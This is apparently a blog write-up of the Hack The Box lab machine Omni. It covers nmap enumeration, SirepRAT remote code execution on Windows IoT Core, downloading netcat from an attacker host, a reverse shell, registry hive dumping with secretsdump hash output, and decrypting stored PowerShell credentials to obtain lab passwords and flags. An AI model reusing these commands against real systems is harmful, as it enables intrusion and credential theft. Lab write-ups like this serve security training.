OMNI HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 10:18 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating Ping Scan at 10:18
Scanning 10.10.10.204 [4 ports]
Completed Ping Scan at 10:18, 0.52s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:18
Scanning omni.htb (10.10.10.204) [1000 ports]
Discovered open port 135/tcp on 10.10.10.204
Discovered open port 8080/tcp on 10.10.10.204
Completed SYN Stealth Scan at 10:18, 29.60s elapsed (1000 total ports)
Initiating Service scan at 10:18
Scanning 2 services on omni.htb (10.10.10.204)
Completed Service scan at 10:18, 8.70s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against omni.htb (10.10.10.204)
Retrying OS detection (try #2) against omni.htb (10.10.10.204)
Initiating Traceroute at 10:19
Completed Traceroute at 10:19, 0.43s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:19
Completed Parallel DNS resolution of 2 hosts. at 10:19, 0.32s elapsed
NSE: Script scanning 10.10.10.204.
Initiating NSE at 10:19
Completed NSE at 10:19, 8.33s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 1.43s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Nmap scan report for omni.htb (10.10.10.204)
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   410.29 ms 10.10.14.1
2   412.53 ms omni.htb (10.10.10.204)

NSE: Script Post-scanning.
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.23 seconds
           Raw packets sent: 2100 (96.092KB) | Rcvd: 1023 (593.916KB)

ENUMERATION

So First we need to get information about the OS of our this device and What kind of Device it is !!

So if we google about omni we know that it might be kind of router something running Windows IOT core

So now we need to find exploit for that but first lets check both ports

PORT 8080

Here we need password for that so lets move further

PORT 135

Here we are getting connection Time Out

┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rpcclient -U " " 10.10.10.204
Enter TESTING\ 's password: 
Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT

So Lets Google For That

Now for Windows IOT exploitation we will get our first link to Github named as SirepRAT – RCE as SYSTEM on Windows IoT Core

https://github.com/SafeBreach-Labs/SirepRAT

Just clone this to your machine

Now if we check all commands we can see through these that these 2 are more important we might need

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

So first lets go through basic command

┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 6, payload peek: 'omni'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

Here we got nothing just a word omni so lets run it with VERBOSE

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe" --v
---------
omni

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 6, payload peek: 'omni'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

Here we go with output

Lets Try something new with this command

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}" --v
---------
C:\Data\Users\System

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 22, payload peek: 'C:\Data\Users\System'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

Here we can see that we need a exe file to execute and in arguments we need command but not all commands

So lets fix this with Powershell.exe

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-Webrequest -Uri http://10.10.14.43/nc64.exe -OutFile C:\Data\Users\app\nc64.exe" --v

Now lets get reverse shell first to play with this machine further !!

STEPS WE ARE GOING TO FOLLOW NOW

Transfer 64 bit NC to omni machine

Then execute that get reverse shell to our machine

TRANSFER THE NC.EXE

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-Webrequest -Uri http://10.10.14.43/nc64.exe -OutFile C:\Data\Users\app\nc64.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0

Executing NC.EXE through cmd.exe

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Data\Users\app\nc64.exe 10.10.14.43 9002 -e cmd.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

GETTING REVERSE SHELL

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49680
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>

Now if you see we have both user and root txt files but some XML file with PowerShell Credentials . To decrypt them We need to be that particular user So to get User access we will be dumping some Reg Keys To get passwords for them

LINK TO HELP YOU :

https://pure.security/dumping-windows-credentials/

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49680
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>reg.exe save hklm\sam sam.save
reg.exe save hklm\sam sam.save
The operation completed successfully.

C:\windows\system32>reg.exe save hklm\security security.save
reg.exe save hklm\security security.save
The operation completed successfully.

C:\windows\system32> reg.exe save hklm\system system.save
 reg.exe save hklm\system system.save
The operation completed successfully.

Now lets decrypt them

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xdc2beb4869328393b57ea9a28aeff84932c3e3ef
dpapi_userkey:0x6760a0b981e854b66007b33962764d5043f3d013
[*] NL$KM 
 0000   14 07 22 73 99 42 B0 ED  F5 11 9A 60 FD A1 10 EF   .."s.B.....`....
 0010   DF 19 3C 6C 22 F2 92 0C  34 B1 6D 78 CC A7 0D 14   ..<l"...4.mx....
 0020   02 7B 81 04 1E F6 1C 66  69 75 69 84 A7 31 53 26   .{.....fiui..1S&
 0030   A3 6B A9 C9 BF 18 A8 EF  10 36 DB C2 CC 27 73 3D   .k.......6...'s=
NL$KM:140722739942b0edf5119a60fda110efdf193c6c22f2920c34b16d78cca70d14027b81041ef61c6669756984a7315326a36ba9c9bf18a8ef1036dbc2cc27733d
[*] Cleaning up... 

Now here we have NTLM hashes we will decrypt them

Here we got password for app user

app : mesh5143

GETTING USER ACCESS

But we cannot login through evil-winrm but we can try it on login page on port 8080

After login we will have a option to Run command which looks like already given shell

So we will be using our previously installed netcat to get our shell

Here we go our shell now we can decrypt those files as we are in terminal as user app

LINKS TO HELP YOU IN DECRYPTING FILES:

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-credential?view=powershell-7

https://www.red-gate.com/simple-talk/sysadmin/powershell/portable-objects-in-powershell-with-clixml/

https://devblogs.microsoft.com/scripting/decrypt-powershell-secure-string-password/

┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49676
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> cd c:\DATA\Users\App
PS C:\DATA\Users\app> ls
ls


    Directory: C:\DATA\Users\app


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-r---         7/4/2020   7:28 PM                3D Objects                    
d-r---         7/4/2020   7:28 PM                Documents                     
d-r---         7/4/2020   7:28 PM                Downloads                     
d-----         7/4/2020   7:28 PM                Favorites                     
d-r---         7/4/2020   7:28 PM                Music                         
d-r---         7/4/2020   7:28 PM                Pictures                      
d-r---         7/4/2020   7:28 PM                Videos                        
-ar---         7/4/2020   8:20 PM            344 hardening.txt                 
-ar---         7/4/2020   8:14 PM           1858 iot-admin.xml                 
-a----        8/24/2020   4:38 AM          45272 nc64.exe                      
-ar---         7/4/2020   9:53 PM           1958 user.txt                      

PS C:\DATA\Users\app> 

PS C:\DATA\Users\app> $cli = Import-Clixml C:\DATA\Users\app\user.txt
$cli = Import-Clixml C:\DATA\Users\app\user.txt
PS C:\DATA\Users\app> $cli | Get-Member 
$cli | Get-Member 


   TypeName: System.Management.Automation.PSCredential

Name                 MemberType Definition                                     
----                 ---------- ----------                                     
Equals               Method     bool Equals(System.Object obj)                 
GetHashCode          Method     int GetHashCode()                              
GetNetworkCredential Method     System.Net.NetworkCredential GetNetworkCrede...
GetObjectData        Method     void GetObjectData(Microsoft.PowerShell.Core...
GetType              Method     type GetType()                                 
ToString             Method     string ToString()                              
Password             Property   securestring Password {get;}                   
UserName             Property   string UserName {get;}                         


PS C:\DATA\Users\app> $cli.GetNetworkCredential().Password
$cli.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70

HERE WE GO WITH USER FLAG

NOW WE HAVE ONE MORE FILE WHICH IS XML AND WITH SAME FORMAT LETS DECRYPT THAT TOO

PS C:\DATA\Users\app> $cli = Import-Clixml C:\DATA\Users\app\iot-admin.xml
$cli = Import-Clixml C:\DATA\Users\app\iot-admin.xml
PS C:\DATA\Users\app> $cli.GetNetworkCredential().Password
$cli.GetNetworkCredential().Password
_1nt3rn37ofTh1nGz
PS C:\DATA\Users\app> 

Here we got some Password lets try it with administrator on evil and login page but we will get it on login page done !!

administrator : _1nt3rn37ofTh1nGz

So lets get shell as administrator and decrypt root flag

Also if we try to use ls command in administrator directory we will be denied due to low privs!!

GETTING ROOT ACCESS

Just follow the same step to get reverse shell from webpage on our terminal !!

Their you will get shell as administrator

┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49677
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> cd C:\DATA\Users
cd C:\DATA\Users
PS C:\DATA\Users> cd Administrator
cd Administrator
PS C:\DATA\Users\Administrator> ls
ls


    Directory: C:\DATA\Users\Administrator


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-r---         7/3/2020  11:23 PM                3D Objects                    
d-r---         7/3/2020  11:23 PM                Documents                     
d-r---         7/3/2020  11:23 PM                Downloads                     
d-----         7/3/2020  11:23 PM                Favorites                     
d-r---         7/3/2020  11:23 PM                Music                         
d-r---         7/3/2020  11:23 PM                Pictures                      
d-r---         7/3/2020  11:23 PM                Videos                        
-ar---         7/4/2020   9:48 PM           1958 root.txt                      


PS C:\DATA\Users\Administrator> $cli = Import-Clixml C:\DATA\Users\Administrator\root.txt
$cli = Import-Clixml C:\DATA\Users\Administrator\root.txt
PS C:\DATA\Users\Administrator> $cli.GetNetworkCredential().Password
$cli.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\DATA\Users\Administrator> 

Here we go with our root flag

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: